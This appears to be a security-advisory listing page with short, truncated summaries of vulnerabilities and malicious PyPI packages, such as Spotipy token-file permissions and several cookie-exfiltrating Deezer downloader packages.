[SECURITY] Fedora 41 Update: python-spotipy-2.25.1-1.fc41

A light weight Python library for the Spotify Web API...

Linux Distros Unpatched Vulnerability : CVE-2024-23346

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Pymatgen Python Materials Genomics is an open-source Python library for materials analysis. A critical security vulnerability exists in the...

aether-observer (>=0.1.0 <=0.1.1), agloom (>=0.1.65 <=0.1.91) +83 more potentially affected by unknown CVE via kuzu (>=0.0.11 <=0.7.1)

kuzu PYPI version =0.0.11, =0.1.0, =0.1.65, =0.1.0, =0.3.0, =0.1.0, =4.3.12, =0.1.0, =0.2.0, =0.1.11, =0.1.1, =0.2.1, =0.1.3, =1.0.2, =1.0.3 - cognee-community-graph-adapter-spanner =0.1.0 and more Source cves: unknown CVE Source advisory: SNYK:PYTHON-KUZU-12179282...

CVE-2025-27154 Spotipy's cache file, containing spotify auth token, is created with overly broad permissions

Spotipy is a lightweight Python library for the Spotify Web API. The CacheHandler class creates a cache file to store the auth token. Prior to version 2.25.1, the file created has rw-r--r-- 644 permissions by default, when it could be locked down to rw------- 600 permissions. This leads to overly...

CLSA-2025-1740645491 python3.11: Fix of CVE-2023-27043

CVE-2023-27043: add a strict parsing mode to prevent incorrect address interpretation. By default, strict=True is enabled. If you need the legacy behavior, explicitly set strict=False when calling parseaddr or getaddresses - Additionally, strict parsing can be disabled globally by setting the...

PYSEC-2025-4 When using the project to bypass Deezer API restrictions, project exfiltrates user data to a hardcoded server.

Published in 2019, the automslc package is a Python library that bypasses Deezer API restrictions to download music. The package was found to exfiltrate user data to a hardcoded server, which could be used for malicious purposes...

PYSEC-2025-5 Exfiltrates user cookies to hardcoded server endpoint during normal operations

Published in 2020, the autodzee package is a Python library that bypasses Deezer API restrictions to download music. The package was found to exfiltrate user data to a hardcoded server, which could be used for malicious purposes...

PYSEC-2025-6 Exfiltrates cookies to hardcoded IP address

Published in 2021, the colabrun package is a Python library that exfiltrates user cookies to a hardcoded IP address. The package was found to exfiltrate user data to a hardcoded server, which could be used for malicious purposes...

PYSEC-2025-7 Posts scraped data to IP address associated with other malware distribution attacks.

Published in 2021, the imblog package is a Python library that scrapes data from a blog page to an IP address associated with other malware distribution attacks...

Posts scraped data to IP address associated with other malware distribution attacks.

Published in 2021, the imblog package is a Python librarythat scrapes data from a blog page to an IP address associated with other malware distribution attacks...

Exfiltrates cookies to hardcoded IP address

Published in 2021, the colabrun package is a Python librarythat exfiltrates user cookies to a hardcoded IP address.The package was found to exfiltrate user data to a hardcoded server,which could be used for malicious purposes...

Exfiltrates user cookies to hardcoded server endpoint during normal operations

Published in 2020, the autodzee package is a Python librarythat bypasses Deezer API restrictions to download music.The package was found to exfiltrate user data to a hardcoded server,which could be used for malicious purposes...

When using the project to bypass Deezer API restrictions, project exfiltrates user data to a hardcoded server.

Published in 2019, the autodzee package is a Python librarythat bypasses Deezer API restrictions to download music.The package was found to exfiltrate user data to a hardcoded server,which could be used for malicious purposes...

When using the project to bypass Deezer API restrictions, project exfiltrates user data to a hardcoded server.

Published in 2019, the automslc package is a Python librarythat bypasses Deezer API restrictions to download music.The package was found to exfiltrate user data to a hardcoded server,which could be used for malicious purposes...

PT-2025-8758 · Pypi · Imblog

Name of the Vulnerable Software and Affected Versions: The product name cannot be determined. Description: The issue concerns a Python library that scrapes data from a blog page to an IP address associated with other malware distribution attacks. Recommendations: At the moment, there is no...

PT-2025-8754 · Autodzee · Autodzee

Name of the Vulnerable Software and Affected Versions: autodzee affected versions not specified Description: The autodzee package, a Python library that bypasses Deezer API restrictions to download music, was found to exfiltrate user data to a hardcoded server. This could potentially be used for...

Malicious code in time-server-analysis (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 5f796bcefeb9b8d3af4bde36c54545d77afdcd6b63284ae58b0a6078b0bbb561 This campaign is built from two parts: 1 packages named like time-check-server, snapshot-photo contain an innocent-looking code that sends "date" to a remote...

MAL-2025-191704 Malicious code in computestpspeedcomp (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 32f4586fefb791454cfa5a7bebbdd0372f4660b05989bfcd74a6f5aad48cb565 Infostealer with multiple possibilities, but not auto-activating on installation. There are already multiple attempts to publish it, with different...

Pygwalker 安全漏洞

Pygwalker is a Python library open-sourced by Kanaries that transforms data into a fully interactive visual exploration interface with a single line of code. A security vulnerability exists in Pygwalker prior to version v.0.4.9.9, which originates from obtaining sensitive information and executin...

OPENSUSE-SU-2025:14739-1 python311-cryptography-44.0.0-1.1 on GA media

These are all security issues fixed in the python311-cryptography-44.0.0-1.1 package on the GA media of openSUSE Tumbleweed...